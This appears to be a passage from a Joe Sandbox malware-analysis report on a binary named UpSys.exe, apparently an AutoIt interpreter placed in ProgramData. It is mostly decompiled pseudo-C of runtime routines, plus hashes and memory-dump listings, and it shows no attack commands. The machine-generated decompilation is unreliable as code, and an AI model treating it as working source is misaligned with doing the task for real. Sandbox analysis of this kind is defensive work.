				_t38 = _t178 + 1; // 0x1
				r8d = _t38;
				E00000001140011400(0, _v168, _a24, _t165, _t166, _t178);
				_t110 = _t105;
				E00000001140007A40(_t110, _t105, _t166);
				 *((intOrPtr*)(_t110 + 8)) = 1;
				 *_t110 = _t89;
				if (_t89 <= 0) goto 0x4000247a;
				_t40 = _t162 + 1; // 0x1
				r8d = _t40;
				r9d = 1;
				E00000001140011400(0, _t110, _a24, _t165, _t166, _t178);
				_t79 = E00000001140001E60(E00000001140013120(_t105, _t110, _t105,  &_v168),  &_v104,  &_v168);
				if (1 - _t89 < 0) goto 0x40002447;
				E00000001140002610(_t79, _t110,  &_v168);
				E00000001140007A40(_t110,  &_v136, _t166);
				return E00000001140012380(0, 0, _t53 & 0x000000ff, _t105, _t110,  &_v104,  &_v168,  &_a24, _t178);
			}
































                                                                                                                                                              0x1400021d0
                                                                                                                                                              0x1400021d0
                                                                                                                                                              0x1400021d0
                                                                                                                                                              0x1400021d5
                                                                                                                                                              0x1400021ea
                                                                                                                                                              0x1400021ed
                                                                                                                                                              0x1400021fc
                                                                                                                                                              0x140002203
                                                                                                                                                              0x14000220f
                                                                                                                                                              0x14000221a
                                                                                                                                                              0x140002231
                                                                                                                                                              0x140002243
                                                                                                                                                              0x14000224a
                                                                                                                                                              0x14000225b
                                                                                                                                                              0x140002260
                                                                                                                                                              0x140002267
                                                                                                                                                              0x14000227e
                                                                                                                                                              0x14000228e
                                                                                                                                                              0x140002298
                                                                                                                                                              0x1400022a9
                                                                                                                                                              0x1400022b1
                                                                                                                                                              0x1400022b5
                                                                                                                                                              0x1400022ba
                                                                                                                                                              0x1400022c1
                                                                                                                                                              0x1400022d8
                                                                                                                                                              0x1400022de
                                                                                                                                                              0x1400022e8
                                                                                                                                                              0x1400022f9
                                                                                                                                                              0x1400022fe
                                                                                                                                                              0x14000231a
                                                                                                                                                              0x140002328
                                                                                                                                                              0x140002348
                                                                                                                                                              0x140002363
                                                                                                                                                              0x14000237a
                                                                                                                                                              0x140002391
                                                                                                                                                              0x1400023a8
                                                                                                                                                              0x1400023ad
                                                                                                                                                              0x1400023b3
                                                                                                                                                              0x1400023c7
                                                                                                                                                              0x1400023d4
                                                                                                                                                              0x1400023d9
                                                                                                                                                              0x1400023e3
                                                                                                                                                              0x1400023e6
                                                                                                                                                              0x1400023f0
                                                                                                                                                              0x1400023f7
                                                                                                                                                              0x1400023ff
                                                                                                                                                              0x14000240d
                                                                                                                                                              0x140002419
                                                                                                                                                              0x14000241e
                                                                                                                                                              0x140002423
                                                                                                                                                              0x140002423
                                                                                                                                                              0x14000242a
                                                                                                                                                              0x140002432
                                                                                                                                                              0x140002435
                                                                                                                                                              0x14000243a
                                                                                                                                                              0x140002441
                                                                                                                                                              0x140002445
                                                                                                                                                              0x14000244e
                                                                                                                                                              0x14000244e
                                                                                                                                                              0x140002452
                                                                                                                                                              0x140002455
                                                                                                                                                              0x140002471
                                                                                                                                                              0x140002478
                                                                                                                                                              0x14000247f
                                                                                                                                                              0x140002489
                                                                                                                                                              0x1400024af

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileModuleName$_errno
                                                                                                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\ProgramData\UpSys.exe$CMDLINE$CMDLINERAW
                                                                                                                                                              • API String ID: 3464838693-769170703
                                                                                                                                                              • Opcode ID: acbc1301fc8630d7ed9fc220bc939684e5614bca398cc9aac37ae9c862a5b2c3
                                                                                                                                                              • Instruction ID: 237dfd5268c2e48474988684763e71144aa1abf146549de2fee32424af8c856d
                                                                                                                                                              • Opcode Fuzzy Hash: acbc1301fc8630d7ed9fc220bc939684e5614bca398cc9aac37ae9c862a5b2c3
                                                                                                                                                              • Instruction Fuzzy Hash: C8A16E72228A8192EB52EB26F4517DEA365F79C7C0F801012FB4A475BADF7DC549CB40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0000000140016240 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 140registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                              			E00000001140016240(void* __rax, long long __rdx, long long _a24, char _a40, char _a568, char _a1096, char _a132736) {
				long _t27;
				void* _t41;
				void* _t42;
				signed long long _t53;
				long long _t56;
				void* _t57;
				void* _t63;
				void* _t64;
				void* _t65;

				E00000001140030CB0(0x20670, __rax, _t64, _t65);
				 *0x400c7f20 = 0x4009c1e0;
				 *0x400c7ef0 = 0;
				 *0x400c7ef1 = 0;
				 *0x400c7ef2 = 0;
				 *0x400c7ef3 = 0;
				 *0x400c7f40 = 0x4009c1e0;
				 *0x400c7ef8 = __rdx;
				 *0x400c7f00 = _t56;
				 *0x400c7f08 = _t56;
				 *0x400c7f10 = 0;
				 *0x400c7f18 = _t56;
				 *0x400c7f28 = _t56;
				 *0x400c7f30 = _t56;
				 *0x400c7f38 = _t56;
				 *0x400c7f48 = _t56;
				 *0x400c7f50 = _t56;
				 *0x400c7f58 = _t56;
				 *0x400c7f68 = 0;
				 *0x400c7f70 = _t56;
				 *0x400c7f78 = 0x66; // executed
				E00000001140016ED8(0x4009c1e0, _t42); // executed
				r8d = 0x104;
				 *0x400c7f60 = 0x4009c1e0;
				GetModuleFileNameW(??, ??, ??);
				r9d = 0;
				_a24 = _t56;
				E0000000114001823C(_t41,  &_a40,  &_a1096, _t57,  &_a568, _t63, _t64, _t65);
				r8d = 0x104;
				E000000011400182CC( &_a568, L"Include",  &_a568, _t64);
				_t53 =  &_a1096;
				r9d = 0;
				_a24 = _t56;
				E0000000114001830C(_t53,  &_a568, _t63);
				E00000001140016ED8(0x4009c1e0,  &_a40);
				 *((long long*)( *0x400c7f60 + _t53 * 8)) = 0x4009c1e0;
				 *0x400c7f68 =  *0x400c7f68 + 1;
				E00000001140016E4C( *((intOrPtr*)( *0x400c7f60 + _t53 * 8)),  &_a40);
				r9d = 0x20019;
				r8d = 0;
				_a24 =  &_a132736;
				_t27 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
				if (_t27 == 0) goto 0x40031f10;
				return _t27;
			}












                                                                                                                                                              0x140016247
                                                                                                                                                              0x14001625d
                                                                                                                                                              0x14001626b
                                                                                                                                                              0x140016272
                                                                                                                                                              0x140016279
                                                                                                                                                              0x140016280
                                                                                                                                                              0x140016287
                                                                                                                                                              0x14001628e
                                                                                                                                                              0x140016295
                                                                                                                                                              0x14001629c
                                                                                                                                                              0x1400162a3
                                                                                                                                                              0x1400162a9
                                                                                                                                                              0x1400162b0
                                                                                                                                                              0x1400162b7
                                                                                                                                                              0x1400162be
                                                                                                                                                              0x1400162c5
                                                                                                                                                              0x1400162cc
                                                                                                                                                              0x1400162d3
                                                                                                                                                              0x1400162da
                                                                                                                                                              0x1400162e0
                                                                                                                                                              0x1400162e7
                                                                                                                                                              0x1400162f1
                                                                                                                                                              0x1400162fb
                                                                                                                                                              0x140016303
                                                                                                                                                              0x14001630a
                                                                                                                                                              0x140016325
                                                                                                                                                              0x140016328
                                                                                                                                                              0x14001632d
                                                                                                                                                              0x140016341
                                                                                                                                                              0x140016347
                                                                                                                                                              0x140016354
                                                                                                                                                              0x140016361
                                                                                                                                                              0x140016364
                                                                                                                                                              0x140016369
                                                                                                                                                              0x140016373
                                                                                                                                                              0x140016385
                                                                                                                                                              0x14001639c
                                                                                                                                                              0x1400163a7
                                                                                                                                                              0x1400163bb
                                                                                                                                                              0x1400163c1
                                                                                                                                                              0x1400163cb
                                                                                                                                                              0x1400163d0
                                                                                                                                                              0x1400163d8
                                                                                                                                                              0x1400163ed

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseFileModuleNameOpenQueryValue_wmakepathmalloc
                                                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                                                              • API String ID: 3387008970-2276155026
                                                                                                                                                              • Opcode ID: 0e0b353f601fefd69fd712fd94d339c83149a6d231ee28fce4f0f28fdc9c5755
                                                                                                                                                              • Instruction ID: 050f8711aada3cb5fce5e224b08e4cb7b3c5c039440d231270149f71ec02db4e
                                                                                                                                                              • Opcode Fuzzy Hash: 0e0b353f601fefd69fd712fd94d339c83149a6d231ee28fce4f0f28fdc9c5755
                                                                                                                                                              • Instruction Fuzzy Hash: BB813972118B8585E7268B16F880BDAB3A5FB8D3C4F40412AF78D47BB9DB79C556C700
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0000000140017130 Relevance: 13.6, APIs: 9, Instructions: 98COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2551688548-0
                                                                                                                                                              • Opcode ID: ba54e494d6464cb40b7d5df2b28299073b0c4269d754a14259fd76f454c3c274
                                                                                                                                                              • Instruction ID: 3ac3627346bc758b6abef7e0beaa462e2dd001c8a770163b196391ba713ae829
                                                                                                                                                              • Opcode Fuzzy Hash: ba54e494d6464cb40b7d5df2b28299073b0c4269d754a14259fd76f454c3c274
                                                                                                                                                              • Instruction Fuzzy Hash: C7416931216B4081EA57DF57E8407E972A5B78CBC4F540426FB8E4BBB6EF3AC4528B01
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00000001400242B8 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 215COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E000000011400242B8(intOrPtr* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi, long long __rbp, void* __r8, long long* __r9, long long _a8, char _a16, long long _a24, long long _a32) {
				long long _v56;
				signed int _t25;
				signed short _t29;
				void* _t35;
				intOrPtr _t36;
				signed int _t38;
				void* _t43;
				signed int _t59;
				void* _t70;
				void* _t75;
				signed short* _t99;
				signed short* _t100;
				signed short* _t101;
				signed short* _t102;
				signed short* _t104;
				signed short* _t105;
				signed short* _t106;
				signed short* _t107;
				signed short* _t109;
				void* _t133;
				long long _t134;

				_t131 = __r8;
				_t95 = __rax;
				_a8 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t59 =  *0x400b4e98; // 0x0
				r14d = 0;
				_t4 = _t134 + 0x20; // 0x20
				r15d = _t4;
				r12d = r8d;
				_t133 = __rcx;
				r9d = r14d;
				r10d = r14d;
				r11d = r14d;
				if ( *__rdx != r15w) goto 0x40024306;
				_t99 = __rdx + 2;
				if ( *_t99 == r15w) goto 0x400242fc;
				_t25 =  *_t99 & 0x0000ffff;
				r8d = 1;
				if (_t25 == 0x61) goto 0x40024353;
				if (_t25 == 0x72) goto 0x4002434b;
				if (_t25 == 0x77) goto 0x40024344;
				E0000000114001EAE4(_t25 - 0x77, __rax);
				r9d = 0;
				r8d = 0;
				_v56 = _t134;
				 *__rax = 0x16;
				E0000000114001EA14(__rax, _t99, __rcx, __rdx, __r9, __rbp, __r8);
				goto 0x40024594;
				goto 0x40024358;
				goto 0x4002435b;
				_t100 =  &(_t99[1]);
				_t29 =  *_t100 & 0x0000ffff;
				if (_t29 == r14w) goto 0x4002453e;
				if (r8d == r14d) goto 0x40024473;
				_t38 = _t29 & 0x0000ffff;
				_t70 = _t38 - 0x53;
				if (_t70 > 0) goto 0x400243fe;
				if (_t70 == 0) goto 0x400243f1;
				if (_t70 == 0) goto 0x40024462;
				if (_t70 == 0) goto 0x400243dc;
				if (_t70 == 0) goto 0x400243d7;
				if (_t70 == 0) goto 0x400243c5;
				_t43 = _t38 - r15d - 0xb - r8d - 0xe;
				if (_t70 == 0) goto 0x400243bc;
				if (_t43 != 4) goto 0x4002431e;
				if (r10d != r14d) goto 0x40024459;
				r10d = r8d;
				goto 0x40024462;
				asm("bts edi, 0x7");
				goto 0x40024462;
				if ((dil & 0x00000040) != 0) goto 0x40024459;
				goto 0x40024462;
				r11d = r8d;
				goto 0x40024459;
				if ((dil & 0x00000002) != 0) goto 0x40024459;
				asm("bts ebp, 0x7");
				goto 0x40024462;
				_t75 = r10d - r14d;
				if (_t75 != 0) goto 0x40024459;
				r10d = r8d;
				goto 0x40024462;
				if (_t75 == 0) goto 0x40024453;
				if (_t75 == 0) goto 0x40024445;
				if (_t75 == 0) goto 0x40024437;
				if (_t75 == 0) goto 0x40024429;
				if (_t43 - 0x46 - r8d - 0xb != 6) goto 0x4002431e;
				if (0 != 0) goto 0x40024459;
				asm("bts edi, 0xe");
				goto 0x40024462;
				if (r9d != r14d) goto 0x40024459;
				r9d = r8d;
				asm("btr ebp, 0xe");
				goto 0x40024462;
				if (r9d != r14d) goto 0x40024459;
				r9d = r8d;
				asm("bts ebp, 0xe");
				goto 0x40024462;
				if (0 != 0) goto 0x40024459;
				asm("bts edi, 0xf");
				goto 0x40024462;
				asm("bt edi, 0xc");
				if (0 >= 0) goto 0x4002445e;
				goto 0x40024462;
				asm("bts edi, 0xc");
				_t101 =  &(_t100[1]);
				if ( *_t101 != r14w) goto 0x4002436f;
				if (r11d == r14d) goto 0x4002453e;
				goto 0x40024482;
				_t102 =  &(_t101[1]);
				if ( *_t102 == r15w) goto 0x4002447e;
				r8d = 3;
				if (E000000011400178AC(_t131, __r9) != r14d) goto 0x4002431e;
				goto 0x400244b0;
				_t104 =  &(_t102[4]);
				if ( *_t104 == r15w) goto 0x400244ac;
				if ( *_t104 != 0x3d) goto 0x4002431e;
				_t105 =  &(_t104[1]);
				if ( *_t105 == r15w) goto 0x400244c0;
				r8d = 5;
				if (E00000001140017ACC(__rax, _t105, L"UTF-8", _t131) != r14d) goto 0x400244ee;
				_t106 =  &(_t105[5]);
				asm("bts edi, 0x12");
				goto 0x4002453e;
				r8d = 8;
				if (E00000001140017ACC(_t95, _t106, L"UTF-16LE", _t131) != r14d) goto 0x40024512;
				_t107 =  &(_t106[8]);
				asm("bts edi, 0x11");
				goto 0x4002453e;
				r8d = 7;
				if (E00000001140017ACC(_t95, _t107, L"UNICODE", _t131) != r14d) goto 0x4002431e;
				asm("bts edi, 0x10");
				goto 0x4002453e;
				_t109 =  &(_t107[8]);
				if ( *_t109 == r15w) goto 0x4002453a;
				if ( *_t109 != r14w) goto 0x4002431e;
				r9d = r12d;
				r8d = 0x15a | r15d;
				_v56 = 0x180;
				_t35 = E0000000114002D6D4( &_a16, _t133); // executed
				if (_t35 != r14d) goto 0x4002433d;
				 *0x400b4540 =  *0x400b4540 + 1;
				_t36 = _a16;
				 *(__r9 + 0x18) = (_t59 | r8d | 0x00000002) & 0xfffffffc;
				 *((intOrPtr*)(__r9 + 0x1c)) = _t36;
				 *(__r9 + 8) = r14d;
				 *__r9 = _t134;
				 *((long long*)(__r9 + 0x10)) = _t134;
				 *((long long*)(__r9 + 0x28)) = _t134;
				return _t36;
			}
























                                                                                                                                                              0x1400242b8
                                                                                                                                                              0x1400242b8
                                                                                                                                                              0x1400242b8
                                                                                                                                                              0x1400242bd
                                                                                                                                                              0x1400242c2
                                                                                                                                                              0x1400242d4
                                                                                                                                                              0x1400242da
                                                                                                                                                              0x1400242e0
                                                                                                                                                              0x1400242e0
                                                                                                                                                              0x1400242e4
                                                                                                                                                              0x1400242ea
                                                                                                                                                              0x1400242ed
                                                                                                                                                              0x1400242f0
                                                                                                                                                              0x1400242f3
                                                                                                                                                              0x1400242fa
                                                                                                                                                              0x1400242fc
                                                                                                                                                              0x140024304
                                                                                                                                                              0x140024306
                                                                                                                                                              0x140024309
                                                                                                                                                              0x140024312
                                                                                                                                                              0x140024317
                                                                                                                                                              0x14002431c
                                                                                                                                                              0x14002431e
                                                                                                                                                              0x140024323
                                                                                                                                                              0x140024326
                                                                                                                                                              0x14002432d
                                                                                                                                                              0x140024332
                                                                                                                                                              0x140024338
                                                                                                                                                              0x14002433f
                                                                                                                                                              0x140024349
                                                                                                                                                              0x140024351
                                                                                                                                                              0x14002435b
                                                                                                                                                              0x140024362
                                                                                                                                                              0x140024369
                                                                                                                                                              0x140024372
                                                                                                                                                              0x140024378
                                                                                                                                                              0x14002437b
                                                                                                                                                              0x14002437e
                                                                                                                                                              0x140024380
                                                                                                                                                              0x140024385
                                                                                                                                                              0x14002438e
                                                                                                                                                              0x140024393
                                                                                                                                                              0x140024398
                                                                                                                                                              0x14002439a
                                                                                                                                                              0x14002439d
                                                                                                                                                              0x1400243a2
                                                                                                                                                              0x1400243ab
                                                                                                                                                              0x1400243b1
                                                                                                                                                              0x1400243b7
                                                                                                                                                              0x1400243bc
                                                                                                                                                              0x1400243c0
                                                                                                                                                              0x1400243c9
                                                                                                                                                              0x1400243d2
                                                                                                                                                              0x1400243d7
                                                                                                                                                              0x1400243da
                                                                                                                                                              0x1400243e0
                                                                                                                                                              0x1400243eb
                                                                                                                                                              0x1400243ef
                                                                                                                                                              0x1400243f1
                                                                                                                                                              0x1400243f4
                                                                                                                                                              0x1400243f6
                                                                                                                                                              0x1400243fc
                                                                                                                                                              0x140024401
                                                                                                                                                              0x140024406
                                                                                                                                                              0x14002440b
                                                                                                                                                              0x140024410
                                                                                                                                                              0x140024415
                                                                                                                                                              0x140024421
                                                                                                                                                              0x140024423
                                                                                                                                                              0x140024427
                                                                                                                                                              0x14002442c
                                                                                                                                                              0x14002442e
                                                                                                                                                              0x140024431
                                                                                                                                                              0x140024435
                                                                                                                                                              0x14002443a
                                                                                                                                                              0x14002443c
                                                                                                                                                              0x14002443f
                                                                                                                                                              0x140024443
                                                                                                                                                              0x14002444b
                                                                                                                                                              0x14002444d
                                                                                                                                                              0x140024451
                                                                                                                                                              0x140024453
                                                                                                                                                              0x140024457
                                                                                                                                                              0x14002445c
                                                                                                                                                              0x14002445e
                                                                                                                                                              0x140024462
                                                                                                                                                              0x14002446d
                                                                                                                                                              0x140024476
                                                                                                                                                              0x14002447c
                                                                                                                                                              0x14002447e
                                                                                                                                                              0x140024486
                                                                                                                                                              0x14002448f
                                                                                                                                                              0x1400244a0
                                                                                                                                                              0x1400244aa
                                                                                                                                                              0x1400244ac
                                                                                                                                                              0x1400244b4
                                                                                                                                                              0x1400244ba
                                                                                                                                                              0x1400244c0
                                                                                                                                                              0x1400244c8
                                                                                                                                                              0x1400244d1
                                                                                                                                                              0x1400244e2
                                                                                                                                                              0x1400244e4
                                                                                                                                                              0x1400244e8
                                                                                                                                                              0x1400244ec
                                                                                                                                                              0x1400244f5
                                                                                                                                                              0x140024506
                                                                                                                                                              0x140024508
                                                                                                                                                              0x14002450c
                                                                                                                                                              0x140024510
                                                                                                                                                              0x140024519
                                                                                                                                                              0x14002452a
                                                                                                                                                              0x140024534
                                                                                                                                                              0x140024538
                                                                                                                                                              0x14002453a
                                                                                                                                                              0x140024542
                                                                                                                                                              0x140024548
                                                                                                                                                              0x140024553
                                                                                                                                                              0x140024556
                                                                                                                                                              0x14002455c
                                                                                                                                                              0x140024564
                                                                                                                                                              0x14002456c
                                                                                                                                                              0x140024572
                                                                                                                                                              0x140024578
                                                                                                                                                              0x14002457c
                                                                                                                                                              0x14002457f
                                                                                                                                                              0x140024582
                                                                                                                                                              0x140024586
                                                                                                                                                              0x14002458c
                                                                                                                                                              0x140024590
                                                                                                                                                              0x1400245b0

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _errno$_wsopen_s
                                                                                                                                                              • String ID: =$UNICODE$UTF-16LE$UTF-8$ccs
                                                                                                                                                              • API String ID: 586276568-31882262
                                                                                                                                                              • Opcode ID: 14989ac0edfc79f759c66c20c9d213f4e163517352168e7a2524b8c4585ad115
                                                                                                                                                              • Instruction ID: 676ca39cbf6b9bd3e34362921d33c76f7ce20de1925a093fde416b8f5bae2124
                                                                                                                                                              • Opcode Fuzzy Hash: 14989ac0edfc79f759c66c20c9d213f4e163517352168e7a2524b8c4585ad115
                                                                                                                                                              • Instruction Fuzzy Hash: 0A71F472B0422082FB77AF17A4407F96695B35DBC0F9A410DFF4A27AF5D679CE819202
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0000000140005380 Relevance: 10.7, APIs: 7, Instructions: 241COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 16%
                                                                                                                                                              			E00000001140005380(signed long long __rcx, signed int __rdx, long long __r12, long long _a8, void* _a16) {
				long long _v56;
				char _v64;
				char _v72;
				intOrPtr _v104;
				void* __rbx;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				long long _t82;
				long long _t86;
				intOrPtr* _t87;
				signed long long _t88;
				intOrPtr* _t90;
				intOrPtr* _t96;
				intOrPtr* _t100;
				void* _t103;
				intOrPtr* _t104;
				void* _t106;
				void* _t112;
				long long _t115;

				_t112 = _t106;
				r13d = 0;
				_t104 = __rcx;
				_t90 =  *((intOrPtr*)(__rdx + 8));
				 *((intOrPtr*)(_t112 + 0x10)) = r13d;
				if ( *((intOrPtr*)( *_t90)) != 0x22) goto 0x40005565;
				if ( *((intOrPtr*)(__rcx + 0x1b8)) == 1) goto 0x4003a325;
				 *((intOrPtr*)(_t112 + 0x10)) = 1;
				if ( *((short*)( *((intOrPtr*)(_t90 + 8)) + 8)) == 0x7f) goto 0x40005539;
				 *((intOrPtr*)(_t112 - 0x48)) = r13d;
				_v64 = 1;
				 *((long long*)(_t112 - 0x38)) = _t115;
				_v104 = 0xffffffff;
				_t49 = E00000001140005700( *((intOrPtr*)(_t90 + 8)), _t86, __rcx, __rdx, _t112 + 0x10, _t112 - 0x48); // executed
				if (_t49 != 0) goto 0x4003a33d;
				_t103 =  *((intOrPtr*)( *_t104 + 4)) + _t104;
				if ( *((intOrPtr*)(_t103 + 0x19)) != r13b) goto 0x4003a34d;
				_t87 =  *((intOrPtr*)(_t103 + 0x10));
				_t82 =  &_v72;
				_a8 = __r12;
				if (_t87 == _t82) goto 0x400054c4;
				if ( *((intOrPtr*)(_t87 + 0x10)) != 0) goto 0x4003a35a;
				_t50 =  *((intOrPtr*)(_t87 + 8));
				if (_t50 == 8) goto 0x4003a36d;
				if (_t50 == 0xa) goto 0x4003a38d;
				if (_t50 == 5) goto 0x4003a3a9;
				if (_t50 == 0xb) goto 0x4003a3b7;
				if (_t50 == 0xc) goto 0x4003a3d1;
				 *((intOrPtr*)(_t87 + 8)) = 1;
				 *_t87 = r13d;
				 *((intOrPtr*)(_t87 + 8)) = _v64;
				if (_v64 != 4) goto 0x4003a3ed;
				E00000001140016ED8(_t82,  *((intOrPtr*)(_t87 + 0x10)));
				if (_t82 == 0) goto 0x4003a5b6;
				_t100 = _v56;
				 *_t82 =  *_t100;
				 *((long long*)(_t82 + 8)) =  *((intOrPtr*)(_t100 + 8));
				 *((long long*)(_t82 + 0x10)) =  *((intOrPtr*)(_t100 + 0x10));
				_t96 =  *((intOrPtr*)(_t100 + 0x18));
				 *((long long*)(_t82 + 0x18)) = _t96;
				 *_t96 =  *_t96 + 1;
				 *((long long*)(_t87 + 0x10)) = _t82;
				if ( *((intOrPtr*)(_t103 + 0x19)) != r13b) goto 0x4003a5be;
				 *((char*)( *((intOrPtr*)(_t103 + 0x10)) + 0x18)) = 1;
				_t88 = _v56;
				if (_t88 == 0) goto 0x40005508;
				 *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x18)))) =  *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x18)))) - 1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t88 + 0x18)))) == r13d) goto 0x4003a5cb;
				0x40016a60();
				_v56 = _t115;
				_t54 = _v64;
				if (_t54 == 8) goto 0x4003a5e2;
				if (_t54 == 0xa) goto 0x4003a606;
				if (_t54 == 5) goto 0x4003a624;
				if (_t54 == 0xb) goto 0x4003a634;
				if (_t54 == 0xc) goto 0x4003a652;
				if ( *((short*)( *((intOrPtr*)(_a8 + _t88 * 8)) + 8)) != 0x7f) goto 0x4003a670;
				 *((char*)(_t104 + 0x238)) = 1;
				return _t54;
			}























                                                                                                                                                              0x140005380
                                                                                                                                                              0x14000538d
                                                                                                                                                              0x140005390
                                                                                                                                                              0x140005393
                                                                                                                                                              0x140005397
